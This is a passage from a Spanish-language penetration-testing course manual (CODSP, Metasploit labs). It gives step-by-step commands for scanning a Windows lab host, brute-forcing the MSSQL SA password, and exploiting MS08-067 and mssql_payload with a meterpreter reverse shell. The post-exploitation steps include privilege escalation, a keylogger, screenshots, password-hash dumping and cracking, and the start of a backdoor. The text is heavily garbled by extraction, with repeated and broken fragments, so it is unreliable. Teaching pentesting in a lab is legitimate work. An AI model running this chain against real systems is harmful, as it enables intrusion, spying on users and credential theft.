Scanning de Puertos y version del puerto TCP 1433: Si se tiene en cuenta los procesos de scanning de puertos realizados en laboratorios pasados, se puede observar que el puerto

tado Listening (Abierto), esperando conexiones, ademásde puertos a este puerto en especial con la opción -sV de nmap, se puede

versión que están detrás de ese puerto, son Microsoft SQl Server Proceder a realizar el scanning de puertos, según los comandos de la siguiente

Identificación de vulnerabilidades servicios MSSQL: El siguiente paso es realizar un de vulnerabilidades, para el caso vamos a buscar vulnerabilidades en

el login y password del usuario SA (System Administrator) del sistema de bases de datos MSSQL SERVER. Para lograr identificar vulnerabilidades en cuanto a credenciales de acceso

, podemos usar el siguiente modulo auxiliar de metasploit llamadoauxiliary/scanner/mssql/mssql_login.

Para poder usar este modulo, se debe realizar de forma secuencial lo siguiente:

use auxiliary/scanner/mssql/mssql_login

set PASS_FILE /pentest/passwords/john/password.lst

set RHOSTS 192.168.137.28 (Aquí colocas la dirección IP de Servidor Windows)

servicios de red que se están evaluando y próximamente atacando, para comprender tion testing realizado.

para evitar todo el tiempo que la aplicación nessus in, se puede usar el software nessus que esta

dable que si el estudiante no conoce como trabaja MSSQL Server, lo investigue por cuenta propia con el fin de mejorar los conocimientos relacionados con auditorias de sistemas intrusivas del tipo Penetration Testing, ya que durante la siguiente

laboratorio, va a comprometer a SQL Server, en lo que respecta a violentar la seguridad del motor de bases de datos, y del sistema operativo que lo contiene..

se tiene en cuenta los procesos de scanning de puertos realizados en laboratorios pasados, se puede observar que el puerto

además si se realiza un sV de nmap, se puede

de ese puerto, son Microsoft SQl Server los comandos de la siguiente

El siguiente paso es realizar un , para el caso vamos a buscar vulnerabilidades en

a de bases de datos MS-en cuanto a credenciales de acceso

modulo auxiliar de metasploit llamado

be realizar de forma secuencial lo siguiente:

set RHOSTS 192.168.137.28 (Aquí colocas la dirección IP de Servidor Windows)

Page 25: Cpods training-metasploit

Certified Offensive and Defensive Security

Como se puede apreciar en las anteriores imágenes, en modulo auxiliar identificar una contraseña débil para el usuario la contraseña de acceso para el usuario SA es Ir más allá: Para complementar este ejercicio, insertar realizar un análisis de vulnerabiliusando el Software NESSUS, revisar en los reportes de este software, que se identifican otro tipo de vulnerabilidades criticas que pueden ser explotadas Paso 2: Identificación de vulnerabilidades servicios HTTP:

pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de análisis de vulnerabilidades. Vamos a utilizar

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Como se puede apreciar en las anteriores imágenes, en modulo auxiliar mssql_login

identificar una contraseña débil para el usuario SA (System Administrator),

la contraseña de acceso para el usuario SA es password

complementar este ejercicio, insertar realizar un análisis de vulnerabiliusando el Software NESSUS, revisar en los reportes de este software, que se identifican otro tipo de vulnerabilidades criticas que pueden ser explotadas usando Metasploit Framework.

Identificación de vulnerabilidades servicios HTTP: Con herramientas diversas que pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de análisis de vulnerabilidades. Vamos a utilizar el software NETCAT para realizar un simple

mssql_login, logro SA (System Administrator), que para el caso,

complementar este ejercicio, insertar realizar un análisis de vulnerabilidades usando el Software NESSUS, revisar en los reportes de este software, que se identifican otro

usando Metasploit Framework.

Con herramientas diversas que pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de

el software NETCAT para realizar un simple

Page 26: Cpods training-metasploit

Certified Offensive and Defensive Security

análisis de vulnerabilidades basado en la huella de identificación de una aplicación. Para poder usar netcat lanzamos el siguiente comando: nc 192.168.137.28 80 (Colocar la dirección IP de su sistema Windows

Lugo ejecutamos el siguiente comando

HEAD / HTTP/1.0

Luego damos sobre enter, y debe de salir un mensaje similar al siguiente:

En la anterior imagen se puede observar perfectamente que el servidor web del equipo Windows 2003 Server, es IIS 6.0, software que tiene códigos de explotación para aprovecharse de dichas vulnerabilidades. Paso 3: Identificación de vulnerabilidades servicios SMB:

pueden encontrase en la versión análisis de vulnerabilidades. Vamos a utilizar el software NMAP acompañado de uno de los script que existen para este software, con el fin de identificar vulnerabilidades ara el servicio SMB, puerto 445 TCP. Para poder usar nmap de la forma que lo necesitamos, lanzamos el siguiente comando: nmap --script smb-check-vulns.nse

de su Windows Server)

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

análisis de vulnerabilidades basado en la huella de identificación de una aplicación. Para poder usar netcat lanzamos el siguiente comando:

(Colocar la dirección IP de su sistema Windows Server)

Lugo ejecutamos el siguiente comando:

Luego damos sobre enter, y debe de salir un mensaje similar al siguiente:

En la anterior imagen se puede observar perfectamente que el servidor web del equipo S 6.0, software que tiene muchísimas vulnerabilidades conocidas y

para aprovecharse de dichas vulnerabilidades.

Identificación de vulnerabilidades servicios SMB: Con herramientas diversas que pueden encontrase en la versión de Linux Backtrack, también pueden realizarse procesos de análisis de vulnerabilidades. Vamos a utilizar el software NMAP acompañado de uno de los script que existen para este software, con el fin de identificar vulnerabilidades ara el servicio

Para poder usar nmap de la forma que lo necesitamos, lanzamos el

vulns.nse -p445 192.168.137.28 (Recordar cambiar la direccion IP

análisis de vulnerabilidades basado en la huella de identificación de una aplicación. Para poder

Server)

En la anterior imagen se puede observar perfectamente que el servidor web del equipo vulnerabilidades conocidas y

Con herramientas diversas que de Linux Backtrack, también pueden realizarse procesos de

análisis de vulnerabilidades. Vamos a utilizar el software NMAP acompañado de uno de los script que existen para este software, con el fin de identificar vulnerabilidades ara el servicio

Para poder usar nmap de la forma que lo necesitamos, lanzamos el

(Recordar cambiar la direccion IP

Page 27: Cpods training-metasploit

Certified Offensive and Defensive Security

En la anterior imagen se puede observar los puede observar que se identifico una vulnerabilidad en el puerto 445 TCP.

Práctica de laboratorio númer

Objetivos: Aprovecharse de las vulnerabilidades encontradas en los pasos y servicanteriores, con la configuración y

Recursos: VMWARE, Metasploit Framework, Windows Server 2003

Observaciones:

� Antes de proceder a realizar la práctica, verificar que las maquinasWindows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas.

� Es altamente importante tener conocimientos básicosservicios de red que se están de seguridad y/o penetration testing realizado.

� Esta práctica tiene como objetivo principal, que el econ la ejecución de exploits dentro de metasploit.

� La vulnerabilidad MS 08concretos y especialesparchados, sin el firewall activo. Esta porque los routers de los ISP bloquean el EXPLOIT ms08-07 es altamente utilizado en las academiasavanzados de hacking, para poder enseñar todas las funcionalidades de metasploit.

Ejecución de la práctica de laboratorio 5

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

En la anterior imagen se puede observar los resultados del comando ejecutado, donde se puede observar que se identifico una vulnerabilidad en el puerto 445 TCP.

Práctica de laboratorio número 5 "Explotación Básica"

: Aprovecharse de las vulnerabilidades encontradas en los pasos y servicconfiguración y ejecución de Exploits y PAYLOADS del tipos

VMWARE, Metasploit Framework, Windows Server 2003 y Backtrack 5

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping entre ambas maquinas. Es altamente importante tener conocimientos básicos-medios al respecto de los servicios de red que se están atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado.

como objetivo principal, que el estudiando se vaya de exploits dentro de metasploit.

La vulnerabilidad MS 08-07, aun puede verse en algunos equipos, pero en casos muy especiales, tales como equipos XP-Server 2003 recién

, sin el firewall activo. Esta explotación no puede hacerse desde la WAN, porque los routers de los ISP bloquean el trafico para puertos como el

07 es altamente utilizado en las academias para cursose hacking, para poder enseñar todas las funcionalidades de metasploit.

de la práctica de laboratorio 5:

resultados del comando ejecutado, donde se

: Aprovecharse de las vulnerabilidades encontradas en los pasos y servicios Server Side

y Backtrack 5

Linux Backtrack y Windows 2003 Server están conectados en el mismo segmento de red, y que hay ping

medios al respecto de los mejor el trabajo de análisis

studiando se vaya ambientando

n algunos equipos, pero en casos muy formateados, no

no puede hacerse desde la WAN, como el 445,139, etc. El para cursos básicos y

e hacking, para poder enseñar todas las funcionalidades de metasploit.

Page 28: Cpods training-metasploit

Certified Offensive and Defensive Security

Paso 1: Explotación de vulnerabilidades servicios SMB:

vulnerabilidades en diversos servicios de red, procedemos a de algunos de ellos que presentan vulnerabilidades conocidas. Para explotar la vulnerabilidad identificada con NMAP y con NESSUS descrita como MS08(Para el siguiente ejercicio de explotación, tener presente el siguiente esquema:

� Ingresar a metasploit

� lanzar el comando search ne

� Seleccionamos el Exploit exploit/windows/smb/ms08_067_netapi

el comando use windows/smb/ms08_067_netapi

� Luego se debe de indicar en la Shell de METASPLOIT la opción verificar las opciones del tipo variable que seexplotar la vulnerabilidad. El resultado del comando, debe de ser similar al de la siguiente imagen:

� Por lo anterior, se debe de identificar que se necesita el puerto TCP 445 abierto (Ver resultados NMAP Annecesita la dirección IP del equipo victima asignada.

� Para asignar la dirección IP de la víctima , debemos de ejecutar el siguiente comando:set RHOST Dirección IP Victima

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

ción de vulnerabilidades servicios SMB: Una vez identificada las vulnerabilidades en diversos servicios de red, procedemos a realizar la respectiva de algunos de ellos que presentan vulnerabilidades conocidas. Para explotar la vulnerabilidad

entificada con NMAP y con NESSUS descrita como MS08-67, debemos realizar lo siguiente:(Para el siguiente ejercicio de explotación, tener presente el siguiente esquema:

metasploit, abriendo la interface msfconsole

search netapi

Exploit exploit/windows/smb/ms08_067_netapi, y lo asignamos con use windows/smb/ms08_067_netapi

Luego se debe de indicar en la Shell de METASPLOIT la opción show options

s opciones del tipo variable que se requiere en este exploit, para poder explotar la vulnerabilidad. El resultado del comando, debe de ser similar al de la

Por lo anterior, se debe de identificar que se necesita el puerto TCP 445 abierto (Ver resultados NMAP Anteriores), correspondiente al servicios CIFS/SMB, además que se necesita la dirección IP del equipo victima asignada. Para asignar la dirección IP de la víctima , debemos de ejecutar el siguiente comando:set RHOST Dirección IP Victima (192.168.119.225 por Ejemplo).

Una vez identificada las la respectiva explotación

de algunos de ellos que presentan vulnerabilidades conocidas. Para explotar la vulnerabilidad 67, debemos realizar lo siguiente:

(Para el siguiente ejercicio de explotación, tener presente el siguiente esquema:

, y lo asignamos con

show options, para este exploit, para poder

explotar la vulnerabilidad. El resultado del comando, debe de ser similar al de la

Por lo anterior, se debe de identificar que se necesita el puerto TCP 445 abierto (Ver teriores), correspondiente al servicios CIFS/SMB, además que se

Para asignar la dirección IP de la víctima , debemos de ejecutar el siguiente comando:

Page 29: Cpods training-metasploit

Certified Offensive and Defensive Security

� Luego se debe de ingresar de nuevo el comando efecto el valor de la dirección IP de la víctima fue asignado a la variables RHOST.

� El siguiente paso es verificar cuales son los PAYLOAD que pueden usarse con estExploit, para lo cual daremos el siguiente comando:

� Luego se debe de elegir uno de los PAYLOAD disponibles, para el caso de este ejercicio, y de las explicaciones presentadas en el Diplomado, vamos a elegir el siguiente payload: windows/meterpreter/reverse_tcp

� Para asignar este PAYLOAD a nuestro Exploit, se debe de ejecutar el siguiente comando: set PAYLOAD windows/meterpreter/reverse_tcp

� Luego la Shell (Consola de METASPLOIT), nos indica que el PAYLOAD se ha cargado.� Luego debemos de dar e

necesita asignar al PAYLOAD elegido.� El PAYLOAD elegido, necesita la variable LHOST, justo como se muestra en la siguiente

imagen (LHOST=Host Local, de donde se lanzara el Exploit, para el caso es la IP equipo Linux Backtrack)

� Para poder asignar el valor de la IP de Backtrack a la variables LHOST, se debe de

ejecutar el siguiente comando: � Se vuelve a ingresar el comando

LHOST quedo con la dirección IP de Backtrack Asignada.� Luego ingresamos el comando

Windows que pueden ser explotados por este Exploit. � Si hasta aquí todo va bien, no queda más qu

(Maquina Con Windows XPlanzar el ataque, solo se debe de ingresar el siguiente comando:

� Luego de que el exploit, se ejecuta el PAYLOAD que hemos elegido,Shell de meterpreter de METASPLOIT. Tal y como se puede observar en la siguiente imagen:

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Luego se debe de ingresar de nuevo el comando show options para verificar que en efecto el valor de la dirección IP de la víctima fue asignado a la variables RHOST.El siguiente paso es verificar cuales son los PAYLOAD que pueden usarse con estExploit, para lo cual daremos el siguiente comando: show payloads Luego se debe de elegir uno de los PAYLOAD disponibles, para el caso de este ejercicio, y de las explicaciones presentadas en el Diplomado, vamos a elegir el siguiente

terpreter/reverse_tcp

Para asignar este PAYLOAD a nuestro Exploit, se debe de ejecutar el siguiente set PAYLOAD windows/meterpreter/reverse_tcp

Luego la Shell (Consola de METASPLOIT), nos indica que el PAYLOAD se ha cargado.Luego debemos de dar el comando show options, para ver las opciones que se necesita asignar al PAYLOAD elegido. El PAYLOAD elegido, necesita la variable LHOST, justo como se muestra en la siguiente imagen (LHOST=Host Local, de donde se lanzara el Exploit, para el caso es la IP equipo Linux Backtrack)

Para poder asignar el valor de la IP de Backtrack a la variables LHOST, se debe de ejecutar el siguiente comando: set LHOST Dirección IP Backtrack (Maquina Atacante)

Se vuelve a ingresar el comando show options, para ver que en efecto la variable LHOST quedo con la dirección IP de Backtrack Asignada. Luego ingresamos el comando show targets, para verificar todos los sistemas Windows que pueden ser explotados por este Exploit. Si hasta aquí todo va bien, no queda más que lanzar el ataque a la maquina victima (Maquina Con Windows XP Y/O Server 2003 ya que ambas estan vulnerableslanzar el ataque, solo se debe de ingresar el siguiente comando: exploit

Luego de que el exploit, se ejecuta el PAYLOAD que hemos elegido, Shell de meterpreter de METASPLOIT. Tal y como se puede observar en la siguiente

para verificar que en efecto el valor de la dirección IP de la víctima fue asignado a la variables RHOST. El siguiente paso es verificar cuales son los PAYLOAD que pueden usarse con este

Luego se debe de elegir uno de los PAYLOAD disponibles, para el caso de este ejercicio, y de las explicaciones presentadas en el Diplomado, vamos a elegir el siguiente

Para asignar este PAYLOAD a nuestro Exploit, se debe de ejecutar el siguiente

Luego la Shell (Consola de METASPLOIT), nos indica que el PAYLOAD se ha cargado. , para ver las opciones que se

El PAYLOAD elegido, necesita la variable LHOST, justo como se muestra en la siguiente imagen (LHOST=Host Local, de donde se lanzara el Exploit, para el caso es la IP del

Para poder asignar el valor de la IP de Backtrack a la variables LHOST, se debe de set LHOST Dirección IP Backtrack (Maquina Atacante)

er que en efecto la variable

, para verificar todos los sistemas

e lanzar el ataque a la maquina victima ya que ambas estan vulnerables). Para

exploit dejándonos en la

Shell de meterpreter de METASPLOIT. Tal y como se puede observar en la siguiente

Page 30: Cpods training-metasploit

Certified Offensive and Defensive Security

� Meterpreter tiene muchas opciones, pero para el caso, vamos a usar la opción que me permite obtener una shell en el equipo víctima, lo cual ingresando el siguiente comando en la consola de meterpreter:

Nota: Antes de lanzar el comando shell, entrar al equipo víctima, como usuario final, y verificar por el administrador de tareas cuantos CMD.exe hay ejecutándose, luego hacer los mismo, pero después de lanzado el comando shell. � Luego de ejecutado el comando shell,

Windows XP y/o muestra en la siguiente imagen.

Anotación: si se presenta algún problema con la ejecución de la shell, digita desde la consola meterpreter el comando getsystem

� El siguiente paso es crear algunas carpetas en la raíz del disco C: del equipo víctima, usando el comando como si fuéramos un usuario normal del equipo, y verificar que en efecto se han creado las carpetas.system32, para efectos de facilidad en la

Paso 2: Explotación de vulnerabilidades

explotación del lado server side

la clave débil del usuario SA (System Administrator de SQL Server), la cual es password.Además que vamos a ir avanzando en los procesos de postdiferentes herramientas que nos ofrece meterpreter. Para explotar la vulnerabilidad en menejercicio de explotación, tener presente

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

tiene muchas opciones, pero para el caso, vamos a usar la opción que me permite obtener una shell en el equipo víctima, lo cual ingresando el siguiente comando en la consola de meterpreter: shell

Antes de lanzar el comando shell, entrar al equipo víctima, como usuario final, y verificar por el administrador de tareas cuantos CMD.exe hay ejecutándose, luego

cer los mismo, pero después de lanzado el comando shell.

Luego de ejecutado el comando shell, el sistema debe de abrir la shell de Server 2003 de la maquina victima (cmd--shell), justo como se

muestra en la siguiente imagen.

otación: si se presenta algún problema con la ejecución de la shell, digita desde la consola getsystem, para escalar privilegios en el sistema atacado.

El siguiente paso es crear algunas carpetas en la raíz del disco C: del equipo víctima, usando el comando mkdir. Luego se debe de ingresar al equipo víctima, como si fuéramos un usuario normal del equipo, y verificar que en efecto se han creado las carpetas. (Recordar crear la carpeta dentro del disco C, y no dentro de

efectos de facilidad en la visualización del directorio

Explotación de vulnerabilidades servicios MSSQL Server: En este segundo paso de server side, vamos a aprovecharnos de la vulnerabilidad identificada con

e débil del usuario SA (System Administrator de SQL Server), la cual es password.Además que vamos a ir avanzando en los procesos de post-explotación

que nos ofrece meterpreter.

Para explotar la vulnerabilidad en mención, debemos de hacer lo siguiente: ejercicio de explotación, tener presente el siguiente esquema)

tiene muchas opciones, pero para el caso, vamos a usar la opción que me permite obtener una shell en el equipo víctima, lo cual podemos lograr

shell

Antes de lanzar el comando shell, entrar al equipo víctima, como usuario final, y verificar por el administrador de tareas cuantos CMD.exe hay ejecutándose, luego

debe de abrir la shell de shell), justo como se

otación: si se presenta algún problema con la ejecución de la shell, digita desde la consola , para escalar privilegios en el sistema atacado.

El siguiente paso es crear algunas carpetas en la raíz del disco C: del equipo Luego se debe de ingresar al equipo víctima,

como si fuéramos un usuario normal del equipo, y verificar que en efecto se han (Recordar crear la carpeta dentro del disco C, y no dentro de

directorio creado)

En este segundo paso de , vamos a aprovecharnos de la vulnerabilidad identificada con

e débil del usuario SA (System Administrator de SQL Server), la cual es password. explotación utilizando las

(Para el siguiente

Page 31: Cpods training-metasploit

Certified Offensive and Defensive Security

� realizar desde msfconsole

� Luego en los resultados que nos aparece en pantalla, seleccionar windows/mssql/mssql_payload

� Asignar al metasploit el uso

windows/mssql/mssql_payload

� Luego vamos a buscar los PAYLOADS disponibles para este exploit con el comando show payloads

� Seleccionamos el PAYLOAD� Luego vamos a dar el comando

pide el Exploit y el Payload seleccionado. Las variables a asignar son: PASSWORD --> aquí ponemos la clave vulnerable, la cual es passwordRHOST--> aquí colocamos la IP de la victimaLHOST--> aquí colocamos la IP del atacante

Todas los valores a las anteriores variables, se asignan con el comando

� finalmente cuando todas las variables están asignadas, se ejecuta el comando exploit

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

msfconsole una búsqueda con el comando search mssql

Luego en los resultados que nos aparece en pantalla, seleccionar windows/mssql/mssql_payload

Asignar al metasploit el uso del exploit en mención con el comando: windows/mssql/mssql_payload Luego vamos a buscar los PAYLOADS disponibles para este exploit con el comando

Seleccionamos el PAYLOAD windows/meterpreter/reverse_tcp

Luego vamos a dar el comando show options para poder ver las opciones que nos pide el Exploit y el Payload seleccionado. Las variables a asignar son:

> aquí ponemos la clave vulnerable, la cual es passwordcolocamos la IP de la victima

colocamos la IP del atacante

Todas los valores a las anteriores variables, se asignan con el comando

finalmente cuando todas las variables están asignadas, se ejecuta el comando

mssql Luego en los resultados que nos aparece en pantalla, seleccionar el exploit

del exploit en mención con el comando: use

Luego vamos a buscar los PAYLOADS disponibles para este exploit con el comando

para poder ver las opciones que nos pide el Exploit y el Payload seleccionado. Las variables a asignar son:

> aquí ponemos la clave vulnerable, la cual es password

Todas los valores a las anteriores variables, se asignan con el comando set

finalmente cuando todas las variables están asignadas, se ejecuta el comando

Page 32: Cpods training-metasploit

Certified Offensive and Defensive Security

Jugando con Meterpreter: Teniendosalimos de la consola de comandos msdos (En caso de estarlo), y desde meterpreter, comenzamos a usar varios comandos.

Una vez desde meterpreter, lanzar los siguientes

� Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr con el comando ps

� Posteriormente debemos de identificar con que proceso nos pudimos colar en el sistema victima Windows 2003 Servercomando: getpid,

comando ps e identificamos el nombre del proceso con que ingresamos al sistema víctima.

� El siguiente paso es colocar en funcionamientpara poder registrar las pulsaciones del teclado.

� Para lograr que el siguiente:

� Abrir en el equipo server 2003 el aplicativo notepad.� Volver al equipo atacante

para poder identificar con que � Una vez que se identifique el ID del notepad, debemos de realizar un

proceso de migración del proceso con el cual hemos comprometido el sistema vívíctima.

� Lo anterior lo logramos con la ejecución del comando ID identificado del proceso notepad.

� Si sale algún mensaje de error por cuestiones de permisos, entonces debemos en la maquina seguido del

� El siguiente paso es poner el keylogger en funcionamcomando:

� Esperar unos segundos, y comenzar a escribir en el notepad de la víctima.� Luego darle � Finalmente usar el comando

visualizar laskeylogger

Anotación: Recordar lanzar el comando comandos diferente a la de metasploitimagen.

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Teniendo presente que meterpreter tiene muchas funcionalidades, salimos de la consola de comandos msdos (En caso de estarlo), y desde meterpreter, comenzamos a usar varios comandos.

Una vez desde meterpreter, lanzar los siguientes comandos:

Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr ps, desde las shell de meterpreter.

Posteriormente debemos de identificar con que proceso nos pudimos colar en el sistema victima Windows 2003 Server. Lo cual podemos identificar ejecutando el

getpid, desde las shell de meterpreter. Luego ejecutamos de nuevo el e identificamos el nombre del proceso con que ingresamos al sistema

El siguiente paso es colocar en funcionamiento un Keylogger en el equipo víctima, para poder registrar las pulsaciones del teclado. Para lograr que el Keylogger funcione de manera adecuada, se debe de hacer lo

Abrir en el equipo server 2003 el aplicativo notepad. Volver al equipo atacante Backtrack y ejecutar de nuevo el comando

poder identificar con que ID esta el notepad ejecutándose.Una vez que se identifique el ID del notepad, debemos de realizar un proceso de migración del proceso con el cual hemos comprometido el sistema víctima, al proceso que ejecuta el notepad en el mismo equipo

Lo anterior lo logramos con la ejecución del comando migrate

identificado del proceso notepad. Si sale algún mensaje de error por cuestiones de permisos, entonces debemos de ejecutar el comando getsystem, para poder escalar privilegios en la maquina víctima. Luego ejecutar de nuevo el comando seguido del respectivo ID, y ya debe de realizar una migración exitosa.El siguiente paso es poner el keylogger en funcionamiento, con el siguientecomando: run keylogrecorder

Esperar unos segundos, y comenzar a escribir en el notepad de la víctima.Luego darle control+c para detener el keylogger Finalmente usar el comando cat desde una Shell nueva de Linux, paravisualizar las capturas de teclas, en la ruta indicada por el registro del keylogger

Recordar lanzar el comando cat desde una consola (Teminal) de diferente a la de metasploit tal y como se muestra en la siguiente

presente que meterpreter tiene muchas funcionalidades, salimos de la consola de comandos msdos (En caso de estarlo), y desde meterpreter,

Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr

Posteriormente debemos de identificar con que proceso nos pudimos colar en el . Lo cual podemos identificar ejecutando el

desde las shell de meterpreter. Luego ejecutamos de nuevo el e identificamos el nombre del proceso con que ingresamos al sistema

en el equipo víctima,

r funcione de manera adecuada, se debe de hacer lo

Backtrack y ejecutar de nuevo el comando ps, esta el notepad ejecutándose.

Una vez que se identifique el ID del notepad, debemos de realizar un proceso de migración del proceso con el cual hemos comprometido el

al proceso que ejecuta el notepad en el mismo equipo

migrate, seguido del

Si sale algún mensaje de error por cuestiones de permisos, entonces , para poder escalar privilegios

. Luego ejecutar de nuevo el comando migrate, , y ya debe de realizar una migración exitosa.

iento, con el siguiente

Esperar unos segundos, y comenzar a escribir en el notepad de la víctima.

desde una Shell nueva de Linux, para capturas de teclas, en la ruta indicada por el registro del

desde una consola (Teminal) de tal y como se muestra en la siguiente

Page 33: Cpods training-metasploit

Certified Offensive and Defensive Security

� Entre otras de las opci

de pantalla de la los siguientes pasos:

Ingresar al equipo víctima, y abrir el notepad y colocar lo siguiente: Hola, mi número de tarjeta de crédito es: 12376666 y la clave es 123333

� Una vez que escribamos eso, regresamos a la shell de meterprter (resultado en pasos anteriores de esta práctica) en Backtrack y ejecutamos el siguiente comando:

� De inmediato debe de salir en Backvíctima, con loespiar a la víctima.

Finalizando esta paso del laboratorio, vamos a obtener todos los hash de los en el sistema víctima, lo cuameterpreter

Luego debemos de colocar esproceso de crack de password. Podemos copiar y pegar los hashes en la ruta /pentest/passwords/john. Una vez procedemos a ejecutar el software crackeadrealizar con el siguiente comando

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Entre otras de las opciones de meterpreter, también se puede registrar capturas de pantalla de la víctima con el comando screenshot, lo cual se puede lograr con

los siguientes pasos:

, y abrir el notepad y colocar lo siguiente:

eta de crédito es: 12376666 y la clave es 123333

Una vez que escribamos eso, regresamos a la shell de meterprter (resultado en pasos anteriores de esta práctica) en Backtrack y ejecutamos el siguiente comando: screenshot

De inmediato debe de salir en Backtrack, una copia de pantalla de la víctima, con lo cual el atacante podrá obtener información valiosa, y podrá espiar a la víctima.

Finalizando esta paso del laboratorio, vamos a obtener todos los hash de los en el sistema víctima, lo cual podemos hacer con el comando hashdump

Luego debemos de colocar estos hash en un archivo de texto para luego proceder a realizar de crack de password. Podemos copiar y pegar los hashes en la ruta

. Una vez allí usamos el editor nano para guardar el archivo, y luego a ejecutar el software crackeador de password john the ripper, lo cual po

realizar con el siguiente comando: ./john hashwin

se puede registrar capturas , lo cual se puede lograr con

Una vez que escribamos eso, regresamos a la shell de meterprter (resultado en pasos anteriores de esta práctica) en Backtrack y ejecutamos

track, una copia de pantalla de la cual el atacante podrá obtener información valiosa, y podrá

Finalizando esta paso del laboratorio, vamos a obtener todos los hash de los usuarios creados desde la consola

tos hash en un archivo de texto para luego proceder a realizar un de crack de password. Podemos copiar y pegar los hashes en la ruta

usamos el editor nano para guardar el archivo, y luego de password john the ripper, lo cual podemos

Page 34: Cpods training-metasploit

Certified Offensive and Defensive Security

Como se puede apreciar en la ima

Anotación: Los hash obtenidos también se pueden copiar y pegar en el siguiente sitio weby allí también pueden ser crackeados

� Sin embargo lo anterior puede ejecutarse d

metasploit, para los cual nos vam auxiliary/analyze/jtr_crack_fast

post/windows/gather/credentials/credential_collector

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Como se puede apreciar en la imagen, el passwords de Windows Server fue crackeado.

Los hash obtenidos también se pueden copiar y pegar en el siguiente sitio weby allí también pueden ser crackeados. http://www.md5decrypter.co.uk

Sin embargo lo anterior puede ejecutarse de una mejor forma, y metasploit, para los cual nos vamos a ayudar de dos módulos auxiliares llamados:

auxiliary/analyze/jtr_crack_fast

post/windows/gather/credentials/credential_collector

s de Windows Server fue crackeado.

Los hash obtenidos también se pueden copiar y pegar en el siguiente sitio web

e una mejor forma, y más fácil usando es llamados:

Page 35: Cpods training-metasploit

Certified Offensive and Defensive Security

� Para poder ejecutar estos dos módulos de forma ejecutando los siguientes pasos:

� desde msfconsole seleccionar el módulo auxiliar: post/windows/gather/credentials/credential_collector

� El anterior modulo se carga en metaspluse post/windows/gathe

� Luego se da el comando show options y se observa que se le debe de indicar las sesiones que se tengan activas en el moento, que para el caso dos, una sesión para la

� indicar la sesión activa con el siguiente comando: � Luego se ejecuta el modulo auxiliar con el comando

Como se puede observar en el siguiente resultado del comando, se obtienen todos los hash de los usuarios de Windo

� Luego se ejecuta el modulo auxiliar de metasploit

cual nos sirve para hacerle crack a todos los passwords de los usuarios del sistema víctima, que para el caso es Windows Server.

� Por último ejecutamos el módulo

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Para poder ejecutar estos dos módulos de forma paralela, se debe de continuar ejecutando los siguientes pasos: desde msfconsole seleccionar el módulo auxiliar: post/windows/gather/credentials/credential_collector El anterior modulo se carga en metasploit con el siguiente comando: use post/windows/gather/credentials/credential_collector.

Luego se da el comando show options y se observa que se le debe de indicar que se tengan activas en el moento, que para el caso deberíamos

para la explotación d MSSQL y otra la explotación SMB.indicar la sesión activa con el siguiente comando: set SESSION 1

el modulo auxiliar con el comando run

Como se puede observar en el siguiente resultado del comando, se obtienen todos los hash de los usuarios de Windows.

Luego se ejecuta el modulo auxiliar de metasploit auxiliary/analyze/jtr_crack_fast

cual nos sirve para hacerle crack a todos los passwords de los usuarios del sistema víctima, que para el caso es Windows Server. Por último ejecutamos el módulo auxiliar con el comando run.

, se debe de continuar

desde msfconsole seleccionar el módulo auxiliar:

Luego se da el comando show options y se observa que se le debe de indicar alguna de deberíamos de tener SMB.

Como se puede observar en el siguiente resultado del comando, se obtienen todos los

/analyze/jtr_crack_fast, el cual nos sirve para hacerle crack a todos los passwords de los usuarios del sistema

Page 36: Cpods training-metasploit

Certified Offensive and Defensive Security

� Finalmente observamos que el módulos nos obtuvo todas las contraseñas (Darle paciencia para obtener las contraseñas, ya que se demora un poco)

Práctica de laboratorio númer

Objetivos: Conocer y utilizar post- explotacion.

Recursos: VMWARE, Metasploit Framework, Windows Server 2003Backtrack 5

Observaciones:

� Antes de proceder a realizar la práctica, verificar que laWindows 2003 y XP, entre ambas maquinas.

� Es altamente importante tener conocimientos básicosservicios de red que se están atacando, para code seguridad y/o penetration testing realizado.

� Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando con la ejecución de exploits dentro de metasploit, y con la consola meterpreter

Ejecución de la práctica de laboratorio 6

Paso 1: Colocar una puerta trasera

meterpreter nos permite hacer muchísimas tareas de explotación y postmaquina víctima, vamos a proceder a dejamaquina víctima, para que nos hacerlo, y no dependa la explotaciónesta puede ser solventada por el admilo siguiente:

� Estar en una consola meterpreter, la cual se lora con la vulnerabilidad conocida en la

Certified Offensive and Defensive Security Professional -CODSP Training

© www.dsteamseguridad.com

Finalmente observamos que el módulos nos obtuvo todas las contraseñas (Darle paciencia para obtener las contraseñas, ya que se demora un poco)

Práctica de laboratorio número 6 "Mas Meterpreter"

utilizar más funcionalidades de meterpreter a nivel de

VMWARE, Metasploit Framework, Windows Server 2003, Windows XP SP2

Antes de proceder a realizar la práctica, verificar que las maquinas Linux Backtrack y están conectados en el mismo segmento de red, y que hay ping

entre ambas maquinas. Es altamente importante tener conocimientos básicos-medios al respecto de los servicios de red que se están atacando, para comprender mejor el trabajo de análisis de seguridad y/o penetration testing realizado. Esta práctica tiene como objetivo principal, que el estudiando se vaya ambientando

e exploits dentro de metasploit, y con la consola meterpreter

de la práctica de laboratorio 6:

